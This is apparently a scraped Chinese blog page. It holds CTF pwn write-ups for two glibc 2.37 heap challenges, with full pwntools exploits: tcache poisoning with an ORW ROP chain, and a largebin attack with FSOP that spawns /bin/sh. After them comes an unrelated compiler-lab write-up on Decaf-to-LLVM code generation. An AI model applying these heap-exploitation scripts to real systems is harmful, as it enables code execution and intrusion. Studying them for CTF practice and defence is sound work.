0%

company

1
GNU C Library (Ubuntu GLIBC 2.37-0ubuntu2) stable release version 2.37.
1
2
3
4
5
6
company: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=1579bb98d790ece68a2411728f492e944628bd50, for GNU/Linux 3.2.0, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
  • Full RELRO,Canary,NX
1
2
3
4
5
6
7
8
9
10
11
0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x08 0xc000003e if (A != ARCH_X86_64) goto 0010
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x05 0xffffffff if (A != 0xffffffff) goto 0010
0005: 0x15 0x03 0x00 0x00000000 if (A == read) goto 0009
0006: 0x15 0x02 0x00 0x00000001 if (A == write) goto 0009
0007: 0x15 0x01 0x00 0x00000002 if (A == open) goto 0009
0008: 0x15 0x00 0x01 0x0000004e if (A != getdents) goto 0010
0009: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0010: 0x06 0x00 0x00 0x00000000 return KILL
  • 白名单,只能打 ORW(没 ban getdents,可能是未知文件名的 ORW)

漏洞分析

UAF 漏洞的变种:没有置空堆上的 chunk_list[index]->data

1
2
3
4
5
6
if ( index <= 0xF && chunk_list[index] )
{
free(chunk_list[index]);
free(chunk_list[index]->data);
chunk_list[index] = 0LL;
}
  • 不管 chunk_list[index]->data 上是否有值,它都会被释放

入侵思路

程序的打印模块有限制,需要绕过:

1
2
3
4
5
if ( strcmp(positiong, "HR") )
{
printf("Sorry %syou're not have access to this\n", nameg);
exit(0);
}

先申请一个 chunk,往 chunk_list[index]->data 上写入 positiong,尝试直接释放 positiong 将其写入 tcache 中(布置好 fake chunk)

再次申请回来时就可以控制 positiongchunk_list

用这种思路可以泄露 libc_base heap_base stack_addr,然后控制 chunk_list 实现堆重叠,最后劫持栈就可以了

由于不清楚服务器上的 flag 名称,因此需要利用 getdents 获取 flag 名称,打印的数据如下:

1
2
3
4
5
 �l 
\x00\x00\x00\x84|���!6\x18..\x00\x00�l
\x00\x0��\xb3 \xac;@\x00lag_you_found_this_my_treasure_leaked.txt\x00\x00�l
\x00\x00p]\xa9
\x176j\x18.\x00\x00\x04l\x0c\x00\x00\xff\xff\xff\xff\xff\xff\xff\x7f \x00ompany\x00\x00\x0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './company1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"

local = 0
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('company.chal.crewc.tf','17001')

def debug():
gdb.attach(p,"b* 0x401708\n")
#gdb.attach(p,"b *$rebase(0x1409)\nb *$rebase(0x137A)\n")
pause()

def cmd(op):
sleep(0.2)
sla(">> ",str(op))

def add(index,name="1",position="HR"+"\x00"*6+p64(0x61),salary=0):
cmd(1)
sla("Index:",str(index))
sa("Name:",name)
sa("Position:",position)
sla("Salary:",str(salary))

def dele(index):
cmd(2)
sla("Index:",str(index))

def add2(index,index2,data):
cmd(3)
sla("you are? ",str(index))
sla("feedback? ",str(index2))
sa("Feedback:",data)

def show(index):
cmd(4)
sla("see? ",str(index))

target_addr = 0x404070
__libc_start_main = 0x403FF0

name = "a"*0x8 + p64(0x61)
sla("name? ",name)

add(0)
add2(0,0,"a"*0x20+"b"*0x20+p64(target_addr))

for i in range(6):
add(i+1)
add2(i+1,i+1,"a"*8)

dele(0)
add(0)
dele(0)

add(10,name="a"*0x10+"HR"+"\x00"*6,position=p64(__libc_start_main)*3+p64(0x404098-0x40))
show(1)

p.recvuntil("Feedback: ")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak_addr-0x23ac0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

stack_libc = libc_base - 0x25c0
success("stack_libc >> "+hex(stack_libc))

dele(10)
add(10)
add2(10,10,"a"*0x10+"HR"+"\x00"*6+p64(stack_libc)*3+p64(0x404098-0x40))
show(1)
p.recvuntil("Feedback: ")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
stack_base = leak_addr
success("leak_addr >> "+hex(leak_addr))
success("stack_base >> "+hex(stack_base))

dele(10)
add(10,name="a"*0x10+"HR"+"\x00"*6,position=p64(0x4040c0)*3+p64(0x404098-0x40))
show(1)
p.recvuntil("Feedback: ")
leak_addr = u64(p.recvuntil("\n")[:-1].ljust(8,"\x00"))
heap_base = leak_addr-0x20d0
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

ret_addr = 0x401770
ret_stack = stack_base - 0x68
bss_addr = 0x404020 + 0x200

pop_rax_ret = 0x0000000000040143 + libc_base
pop_rdi_ret = 0x00000000000240e5 + libc_base
pop_rsi_ret = 0x000000000002573e + libc_base
pop_rdx_ret = 0x0000000000026302 + libc_base
syscall_ret = 0x00000000000e3859 + libc_base

payload = "a"*8
payload += p64(pop_rax_ret) + p64(0)
payload += p64(pop_rsi_ret) + p64(stack_base-0x30)
payload += p64(pop_rdx_ret) + p64(0x200)
payload += p64(syscall_ret) + p64(0)

add(9)
add2(9,9,"a"*0x20+"b"*0x20+p64(heap_base+0x1e00))
dele(9)
add(9)

dele(9)
key = (heap_base + 0x1e30)>>12
success("ret_stack >> "+hex(ret_stack))
add(9,name="a"*8,position=p64(0)+p64(0x61)+p64((ret_stack-8)^key))
add(3)

#pause() # b* 0x401770
#debug()
add2(3,3,payload)

payload = ""
payload += p64(pop_rax_ret) + p64(2)
payload += p64(pop_rdi_ret) + p64(stack_base+0xa8)
payload += p64(pop_rsi_ret) + p64(0)
payload += p64(pop_rdx_ret) + p64(0)
payload += p64(syscall_ret)

payload += p64(pop_rax_ret) + p64(0)
payload += p64(pop_rdi_ret) + p64(3)
payload += p64(pop_rsi_ret) + p64(stack_base+0xa8)
payload += p64(pop_rdx_ret) + p64(0x60)
payload += p64(syscall_ret)

payload += p64(pop_rax_ret) + p64(1)
payload += p64(pop_rdi_ret) + p64(1)
payload += p64(pop_rsi_ret) + p64(stack_base+0xa8)
payload += p64(pop_rdx_ret) + p64(0x60)
payload += p64(syscall_ret)

payload += "./flag_you_found_this_my_treasure_leaked.txt\x00"

"""
payload = ""
payload += p64(pop_rax_ret) + p64(2)
payload += p64(pop_rdi_ret) + p64(stack_base+0xd0)
payload += p64(pop_rsi_ret) + p64(0)
payload += p64(pop_rdx_ret) + p64(0)
payload += p64(syscall_ret)

payload += p64(pop_rax_ret) + p64(78)
payload += p64(pop_rdi_ret) + p64(3)
payload += p64(pop_rsi_ret) + p64(bss_addr+0x200)
payload += p64(pop_rdx_ret) + p64(4096)
payload += p64(syscall_ret)

payload += p64(pop_rax_ret) + p64(1)
payload += p64(pop_rdi_ret) + p64(1)
payload += p64(pop_rsi_ret) + p64(bss_addr+0x200)
payload += p64(pop_rdx_ret) + p64(0x200)
payload += p64(syscall_ret)


payload = payload.ljust(0x100,"1")
payload += "."+"\x00"*7
"""

sleep(0.5)
p.sendline(payload)

p.interactive()

company2

1
GNU C Library (Ubuntu GLIBC 2.37-0ubuntu2) stable release version 2.37.
1
2
3
4
5
6
company: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=09dfe618c92dba9281d433d52c79577575661c73, for GNU/Linux 3.2.0, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

漏洞分析

有 UAF 漏洞:

1
2
3
4
5
if ( index <= 0xF && chunk_list[index] )
{
free(chunk_list[index]);
chunk_list[index]->Size = 0LL;
}

程序可以进行泄露:

1
2
3
4
5
if ( index <= 0xF && chunk_list[index] && chunk_list[index]->Size )
{
printf("Feedback (%ld): ", chunk_list[index]->Size - 0x48);
read(0, &chunk_list[index]->data, chunk_list[index]->Size - 0x48);
}

入侵思路

利用 UAF 配合程序提供的 printf 即可完成泄露:(注意堆风水的搭建)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
add(0,0x550)
add(1,0x550)
add(2,0x550)
dele(1)
dele(0)
add(3,0x570)
add(4,0x530)
dele(4)

cmd(3)
sla("you are? ",str(0))
sla("feedback? ",str(1))
ru("Feedback (")
leak_addr = eval(ru(")"))
libc_base = leak_addr - 0x1f6c98
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

io_list_all = libc_base + 0x1f7680
success("io_list_all >> "+hex(io_list_all))

add(5,0x530)
add(6,0x540)
add(7,0x540)
dele(6)
dele(5)

cmd(3)
sla("you are? ",str(0))
sla("feedback? ",str(1))
ru("Feedback (")
leak_addr = eval(ru(")"))
heap_base = leak_addr - 0x1268
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

利用程序提供的修改函数可以很轻易地修改 large chunk+0x18,方便我们进行 largebin attack:

1
2
3
4
5
6
7
8
9
10
11
printf("Which Employee you want to increase the salary? ");
__isoc99_scanf("%d", &index);
if ( index <= 0xF && chunk_list[index] )
{
printf("Salary: ");
__isoc99_scanf("%lu", &chunk_list[index]->Salary);
}
else
{
puts("Sorry Not Allowed!");
}

最后打 IO,通过 house of cat 就可以 get shell

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './company1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('company.chal.crewc.tf','17001')

def debug():
#gdb.attach(p,"b* 0x401708\n")
gdb.attach(p)
#pause()

def cmd(op):
sleep(0.2)
sla(">> ",str(op))

def add(index,size,name="1",position="HR",salary=0):
cmd(1)
sla("Index:",str(index))
if(type(size)==int):
sla("Size: ",str(size))
else:
sla("Size: ",size)
sa("Name:",name)
sa("Position:",position)
sla("Salary:",str(salary))

def dele(index):
cmd(2)
sla("Index:",str(index))

def edit(index,index2,data):
cmd(3)
sla("you are? ",str(index))
sla("feedback? ",str(index2))
sa("Feedback",data)

def show(index):
cmd(4)
sla("see? ",str(index))

def salary(index,sala):
cmd(5)
sla("salary?",str(index))
sla("Salary: ",str(sala))

name = "a"*0x8 + p64(0x61)
sla("name? ",name)

add(0,0x550)
add(1,0x550)
add(2,0x550)
dele(1)
dele(0)
add(3,0x570)
add(4,0x530)
dele(4)

cmd(3)
sla("you are? ",str(0))
sla("feedback? ",str(1))
ru("Feedback (")
leak_addr = eval(ru(")"))
libc_base = leak_addr - 0x1f6c98
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

io_list_all = libc_base + 0x1f7680
success("io_list_all >> "+hex(io_list_all))

add(5,0x530)
add(6,0x540)
add(7,0x540)
dele(6)
dele(5)

cmd(3)
sla("you are? ",str(0))
sla("feedback? ",str(1))
ru("Feedback (")
leak_addr = eval(ru(")"))
heap_base = leak_addr - 0x1268
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

add(8,0x560)
add(9,0x530)
dele(9)

salary(6,io_list_all-0x20)
add(10,0x550)

libc_system = libc_base + libc.sym["system"]
setcontext = libc_base + libc.sym["setcontext"] + 61
_IO_wfile_jumps = libc_base + libc.sym["_IO_wfile_jumps"]

next_chain = 0
fake_io_addr = heap_base + 0x12c0 - 0x10
payload_addr = heap_base + 0x858
flag_addr = heap_base

#fake_IO_FILE = "/bin/sh\x00" #_flags=rdi
#fake_IO_FILE += p64(0)*5
#fake_IO_FILE += p64(1)+p64(2) # rcx!=0(FSOP)
fake_IO_FILE = p64(2)
fake_IO_FILE += p64(payload_addr-0xa0)#_IO_backup_base=rdx
fake_IO_FILE += p64(setcontext)#_IO_save_end=call addr(call setcontext/system)
fake_IO_FILE = fake_IO_FILE.ljust(0x58-0x38, '\x00')
fake_IO_FILE += p64(0) # _chain
fake_IO_FILE = fake_IO_FILE.ljust(0x78-0x38, '\x00')
fake_IO_FILE += p64(flag_addr) # _lock = a writable address
fake_IO_FILE = fake_IO_FILE.ljust(0x90-0x38, '\x00')
fake_IO_FILE += p64(fake_io_addr+0x30)#_wide_data,rax1_addr
fake_IO_FILE = fake_IO_FILE.ljust(0xb0-0x38, '\x00')
fake_IO_FILE += p64(1) #mode=1
fake_IO_FILE = fake_IO_FILE.ljust(0xc8-0x38, '\x00')
fake_IO_FILE += p64(_IO_wfile_jumps+0x30) # vtable=IO_wfile_jumps+0x10
fake_IO_FILE += p64(0)*6
fake_IO_FILE += p64(fake_io_addr+0x40) # rax2_addr

add(11,0x530)
salary(6,heap_base+0x12b0)
add(12,0x540,name="/bin/sh\x00"+p64(0)*2,position=p64(0)+p64(1))
edit(2,12,fake_IO_FILE)

syscall_ret = 0x000000000010b3c9 + libc_base
pop_rdi_ret = 0x00000000000240e5 + libc_base
pop_rsi_ret = 0x000000000002573e + libc_base
pop_rdx_ret = 0x0000000000026302 + libc_base
pop_rax_ret = 0x0000000000040143 + libc_base

payload = p64(payload_addr)
payload += p64(pop_rdi_ret) + p64(fake_io_addr+0x10)
payload += p64(pop_rsi_ret) + p64(0)
payload += p64(pop_rdx_ret) + p64(0)
payload += p64(pop_rax_ret) + p64(59)
payload += p64(syscall_ret)

edit(2,11,payload)
#debug()
cmd(9)

p.interactive()

decafexpr

本作业的目标是为变量编写一个代码生成器,用于处理 Decaf 编程语言的简单表达式和方法

输出将在 LLVM 程序集中,该程序集被编译为x86程序集,然后使用 LLVM 工具 llvm-run 编译为二进制文件(工具 llvm-run 一定要有执行权限)

第一步是为编译器编写符号表,Decaf 的结构和代码生成提示在 Decaf 规范中给出:Decaf Programming Language Specification

在开始此实验之前,建议先完成 LLVM 的练习:SFU Compilers class: LLVM Practice (anoopsarkar.github.io) (这里介绍了一些 llvm api 的使用方式)

实验描述

本实验有两个步骤:

  • 实现可以跟踪变量和方法的符号表
  • 表达式的代码生成

符号表是从标识符到任何信息的映射,需要编译器自动生成

符号表很容易用哈希表或映射实现,例如:cpp stl 的符号表的声明

1
typedef map<string, descriptor* > symbol_table;

其中描述符是包含有用信息的结构或类

在 Decaf 中允许隐藏一个变量声明(在作用域内声明一个变量,但在实际使用之前不对其进行初始化或赋值),这意味着块中标识符的新定义将导致新的描述符与标识符相关联,但一旦块终止必须恢复标识符的先前描述符

实现此本地作用域概念的一种简单方法是指定每个块可以在列表中创建新的符号表:

1
2
typedef list<symbol_table > symbol_table_list;
symbol_table_list symtbl;

如果一个变量的局部定义隐藏了同一变量名称的另一个定义,我们只需扫描从最近的一个开始的符号表列表,就可以获取该变量最近定义的描述符:

1
2
3
4
5
6
7
8
9
descriptor* access_symtbl(string ident) {
for (auto i : symtbl) {
auto find_ident = i.find(ident);
if (find_ident != i.end()) {
return find_ident->second;
}
}
return NULL;
}

为以下 Decaf 片段提供代码生成器,其中包括:

  • 算术和布尔表达式
  • 函数调用
  • 函数定义(包括递归函数)
  • 外部函数的声明(所有外部函数都在 decaf-stdlib.c 中定义)

LLVM 程序集和工具链输出将转储到目录 llvm 中,应检查输出以调试编译器,请务必遵守以下要求:

  • 如果程序成功解析输入 exit(EXIT_SUCCESS),则应使用 退出程序
  • 如果您的程序在输入的无咖啡因程序中发现错误,则应使用 exit(EXIT_FAILURE)
  • 您必须通过调用 TheModule->print(errs(),nullptr) 来转储 LLVM 程序集,其中模块的类型为 llvm::Module*

可以使用如下命令对程序进行打分:

1
2
python3 zipout.py -r decafexpr
python3 check.py

实验步骤

首先需要把上一个实验的 decafast.y decafast.lex decafast.cc 放入本实验的 answer 目录,然后修改文件名称:

1
2
3
mv decafast.lex decafexpr.lex
mv decafast.y decafexpr.y
mv decafast.cc decafexpr.cc
  • 修改 decafexpr.lex decafexpr.y decafexpr.cc 中的头文件引用
  • default.y 中有关 LLVM 的代码拷贝到 decafexpr.y
  • default.cc 中有关 LLVM 的代码拷贝到 decafexpr.cc

本实验的目标就是将 decaf 代码转化为 llvm ir 代码,并且需要判断程序的语义是否错误,然后用 llvm 工具将 llvm ir 转化为二进制文件

先看一个简单的样例:对于类型提升的处理

1
2
3
4
5
6
7
8
9
10
11
extern func print_int(int) void;
package Test {
func main() int
{
var x int;
print_int(true && true);
print_int(true && false);
print_int(false && true);
print_int(false && false);
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
; ModuleID = 'Test'
source_filename = "DecafExpr"

declare void @print_int(i32)

define i32 @main() {
entry:
%x = alloca i32
call void @print_int(i32 1)
call void @print_int(i32 0)
call void @print_int(i32 0)
call void @print_int(i32 0)
ret i32 0
}
  • 这里的实际传参类型和该函数定义的传参类型不同

编译修改好的实验初始文件,尝试将该样例作为输入,输出的结果如下:

1
2
3
4
5
6
7
; ModuleID = 'Test'
source_filename = "Test"

define i32 @main() {
entry:
ret i32 0
}

现在的目标就是用 llvm api 去识别 decaf 的语法分析树,将其转化为 llvm ir

核心步骤就是在上一个实验的基础上进行修改,在合适的位置为其添加 llvm api,并在上一个实验的类中添加对应的 llvm 类指针和 Codegen 函数

  • 本实验采用从下往上分析法,和 llvm api 需要的执行顺序不同
  • 因此只能把 llvm 相关操作写入 Codegen,当从下往上的分析结束时,就从上往下调用 Codegen 来构建 llvm ir

接下来的实验目标就是为各个类补充 llvm api 指针和 Codegen 函数,我会依照几个实验案例来展示一些我认为比较棘手的问题(包括遇到的问题和解决思路)

首先是上述案例,需要解决的问题就是对传参类型不同的处理:

  • 一开始我打算直接修改 true 的类型,但后来发现直接修改类型会对后续 true 的使用产生影响(具体而言是影响了 llvm::Value
  • 然后选择将函数参数的 llvm::Value 提取出来,根据函数定义所规定的传参类型新定义一个 llvm::Value,并使用该 llvm::Value 调用 CreateCall
  • 最后在查看实验文档时发现了零扩展函数 CreateZExt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
llvm::Value * decafFunCall::Codegen() { 
descriptor * des = get_symbol(this->get_name());
llvm::Function * llvm_func = des->func;
std::vector<llvm::Value *> putsargs;
std::vector<llvm::Type *> putstypes;

for (auto& arg : llvm_func->args()) {
llvm::Type* func_type = arg.getType();
putstypes.push_back(func_type);
}
int i = 0;
for(auto p:this->get_para()){
decafBinexp * exp = (decafBinexp *)p;
llvm::Value* vt = exp->Codegen();
llvm::Type* func_type = putstypes[i++];

vt = Builder.CreateZExt(vt, func_type, "zexttmp");
/*
if(exp->get_kind() != "VariableExpr"){
llvm::ConstantInt* constantInt = llvm::dyn_cast<llvm::ConstantInt>(vt);
if (constantInt) {
llvm::APInt apIntValue = constantInt->getValue();
int intValue = apIntValue.getZExtValue();
vt = llvm::ConstantInt::get(func_type, intValue);
}
}
*/

putsargs.push_back(vt);
}

llvm::Value *ret_value = Builder.CreateCall(llvm_func, putsargs);
return ret_value;
}
  • PS:对返回类型的处理同理

接着分析下一个样例:对于表达式的处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
extern func print_int(int) void;

package foo {
func main() int {
var flag bool;
var a, b, c bool;
var size int;
a = true;
b = false;
c = true;
flag = a || b && !c;
size = 1 >> 3 + 1 / -2 % 10 - 5 * 2 / 20 << 2;
print_int(size);
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
; ModuleID = 'foo'
source_filename = "DecafExpr"

declare void @print_int(i32)

define i32 @main() {
entry:
%flag = alloca i1
%a = alloca i1
%b = alloca i1
%c = alloca i1
%size = alloca i32
store i1 true, i1* %a
store i1 false, i1* %b
store i1 true, i1* %c
%a1 = load i1, i1* %a
%b2 = load i1, i1* %b
%c3 = load i1, i1* %c
%nottmp = xor i1 %c3, true
%andtmp = and i1 %b2, %nottmp
%ortmp = or i1 %a1, %andtmp
store i1 %ortmp, i1* %flag
store i32 0, i32* %size
%size4 = load i32, i32* %size
call void @print_int(i32 %size4)
ret i32 0
}
  • 这个案例主要展示了如何处理表达式

其中最困难的地方就是区别:一元运算类,二元运算类,常量类,变量类

我的做法是令二元运算类 decafBinexp 继承常量/变量类 decafAllexp,然后将一元运算类 decafUnaryexp 当成特殊的 decafBinexp

最后在 decafBinexp::Codegen 中分情况讨论,对于不同的类进行不同的处理:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
llvm::Value *decafBinexp::Codegen() {
if(this->des.kind == valueK){
decafAllexp * exp = (decafAllexp *)this;
return exp->Codegen();
}
else if(this->des.kind == expuK){
llvm::Value *L = Exp1->Codegen();
if (L == 0) {
return 0;
}
switch (this->get_op(Option)) {
case nottmp:
this->des.value = Builder.CreateNot(L, "nottmp");
break;
case negtmp:
this->des.value = Builder.CreateNeg(L , "negtmp");
break;
}
return this->des.value;
}
else if(this->des.kind == expbK){
llvm::Value *L = Exp1->Codegen();
llvm::Value *R = Exp2->Codegen();
if (L == 0 || R == 0) {
return 0;
}

switch (this->get_op(Option)) {
case addtmp:
this->des.value = Builder.CreateAdd(L, R, "addtmp");
break;
case subtmp:
this->des.value = Builder.CreateSub(L, R, "subtmp");
break;
case multmp:
this->des.value = Builder.CreateMul(L, R, "multmp");
break;
case remtmp:
this->des.value = Builder.CreateSRem(L, R, "remtmp");
break;
case divtmp:
this->des.value = Builder.CreateSDiv(L, R, "divtmp");
break;
case ortmp:
this->des.value = Builder.CreateOr(L, R, "ortmp");
break;
case andtmp:
this->des.value = Builder.CreateAnd(L, R, "andtmp");
break;
case eqtmp:
this->des.value = Builder.CreateICmpEQ(L, R, "eqtmp");
break;
case netmp:
this->des.value = Builder.CreateICmpNE(L, R, "netmp");
break;
case slttmp:
this->des.value = Builder.CreateICmpSLT(L, R, "slttmp");
break;
case sgttmp:
this->des.value = Builder.CreateICmpSGT(L, R, "sgttmp");
break;
case sletmp:
this->des.value = Builder.CreateICmpSLE(L, R, "sletmp");
break;
case sgetmp:
this->des.value = Builder.CreateICmpSGE(L, R, "sgetmp");
break;
case shltmp:
this->des.value = Builder.CreateShl(L, R, "shltmp");
break;
case shrtmp:
this->des.value = Builder.CreateLShr(L, R, "shrtmp");
break;
default:
this->des.value = NULL;
break;
}
return this->des.value;
}
else if(this->des.kind == funcK){
decafFunCall * call = (decafFunCall *)this;
this->des.value = call->Codegen();
return this->des.value;
}
}
  • 其实就是把对 decafAllexp decafBinexp decafUnaryexp 的处理都整合到了 decafBinexp::Codegen
  • 最后一个函数调用的处理其实是特殊情况,我为了方便就直接把它放到这个地方了
  • 对于 “语句Stmt” 的处理也可以使用上述思路(本实验没有要求处理 “语句Stmt”)

参考以下案例:对于函数定义和函数调用的处理

1
2
3
4
5
6
7
8
9
10
11
extern func print_int(int) void;

package Test {
func main() int {
test(10, 13);
}
func test(a int, b int) void {
print_int(a);
print_int(b);
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
; ModuleID = 'Test'
source_filename = "DecafExpr"

declare void @print_int(i32)

define i32 @main() {
entry:
call void @test(i32 10, i32 13)
ret i32 0
}

define void @test(i32 %a, i32 %b) {
entry:
%a1 = alloca i32
store i32 %a, i32* %a1
%b2 = alloca i32
store i32 %b, i32* %b2
%a3 = load i32, i32* %a1
call void @print_int(i32 %a3)
%b4 = load i32, i32* %b2
call void @print_int(i32 %b4)
ret void
}
  • 这个案例有一个特点:在定义 test 前,先在 main 中调用了 test
  • 为了实现这个效果,我将 “函数定义” 的相关操作拆为两部分,分别放入 decafFuncDef::Codegenmethod_decl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
llvm::Value *decafFuncDef::Codegen() { 
descriptor* des = get_symbol(this->get_name());
if(check_symbol( this->get_name(), funcK)){
get_return = true;

llvm::BasicBlock *BB = llvm::BasicBlock::Create(TheContext, "entry", this->lfunc);
Builder.SetInsertPoint(BB);

int i = 0;
for(auto p:this->get_para()->get_para()){
this->lfunc->getArg(i)->setName(p->get_name());

descriptor * des2 = new descriptor();
if(put_symbol(p->get_name(),des2)){
des2->alloc = Builder.CreateAlloca(p->lType, 0, p->get_name());
des2->kind = valueK;
}
Builder.CreateStore(this->lfunc->getArg(i),des2->alloc);
i++;
}

decafBlock * B = this->get_block();
B->Codegen();

if(get_return){
if(this->lType->isVoidTy())
Builder.CreateRetVoid();
else
Builder.CreateRet(llvm::ConstantInt::get(TheContext, llvm::APInt(32, 0)));
}
}
return this->lfunc;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
method_decl: T_FUNC T_ID T_LPAREN para_list_def T_RPAREN method_type block {
decafFuncDef *func = new decafFuncDef();
decafPara* para = (decafPara*)$4;
decafBlock * block = (decafBlock*)$7;
decafType * type = (decafType *)$6;
func->put_name($2);
func->put_type(type);
func->put_para(para);
func->put_block(block);
$$ = func;
delete $2;

descriptor* des = new descriptor();
if(put_symbol( func->get_name(), des)){
llvm::Type *returnTy = func->lType;
std::vector<llvm::Type *> functionArgs;
for(auto p:func->get_para()->get_para()){
functionArgs.push_back(p->lType);
}

func->lfunc = llvm::Function::Create(
llvm::FunctionType::get(returnTy, functionArgs ,false),
llvm::Function::ExternalLinkage,
func->get_name(),
TheModule);
if (func->lfunc == 0) {
throw runtime_error("empty function block");
}

des->func = func->lfunc;
des->kind = funcK;
}
}
;

完整代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
